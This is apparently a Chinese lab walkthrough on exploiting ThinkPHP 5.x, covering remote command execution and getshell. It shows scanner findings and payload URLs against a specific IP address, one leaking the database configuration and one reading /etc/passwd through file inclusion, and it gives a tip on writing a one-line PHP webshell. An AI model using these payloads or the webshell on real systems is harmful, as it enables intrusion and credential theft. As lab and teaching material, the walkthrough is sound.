常见框架漏洞攻略-ThinkPHP篇

漏洞名称:Thinkphp5x远程命令执行及getshell
第一步:开启靶场
第二步:准备工具
第三步:启动工具,进行漏洞检测
复制代码
#存在漏洞
1.目标存在tp5_invoke_func_code_exec_1漏洞

2.目标存在tp5_dbinfo_leak漏洞
  payload:
  http://47.103.81.25:8080?s=index/think\config/get&name=database.hostname
  hostname: 127.0.0.1, hostport: , database: , username: , password: root
  
3.目标存在tp5_file_include漏洞
  payload: 
  http://47.103.81.25:8080?s=index/\think\Lang/load&file=/etc/passwd
第四步:选择相应poc,执行tp5_invoke_func_code_exec_1漏洞
第五步:查看tp5_file_include漏洞
第六步:尝试GetShell
注意:

如果采取手工注入需注意:写一句话木马时如果是在双引号中,特殊字符$_GET会被转义而导致无法执行,如果非要使用双引号的话,需要在前添加转义字符

FROM IYU_

相关推荐
сокол1 小时前
【网安-Web渗透测试-免杀系列】内存免杀(无文件落地)
windows·网络安全
心 一2 小时前
Lonkero Web安全扫描器:从安装到实战的完整指南
安全·web安全
学习溢出3 小时前
【网络安全】追踪PowerShell命令历史
安全·网络安全
Sombra_Olivia4 小时前
Vulhub 中的 cmsms CVE-2019-9053 & CVE-2021-26120
安全·web安全·网络安全·渗透测试·vulhub
数字护盾(和中)4 小时前
攻击链识别:企业抵御快攻型勒索攻击的关键能力
网络·安全·web安全
叶半欲缺5 小时前
软考-中级信息安全工程师全战备资源包介绍和分享
网络·web安全
爱搬砖的狮子5 小时前
【网络安全】初识Burp Suite
安全·web安全
大方子6 小时前
【PolarCTF】bllbl_ser1
网络安全·polarctf
Chengbei116 小时前
小程序 AI 渗透新工具MCP!打通调试与安全检测、网络抓包、接口分析、越权检测一站式实现
人工智能·安全·web安全·搜索引擎·网络安全·小程序·系统安全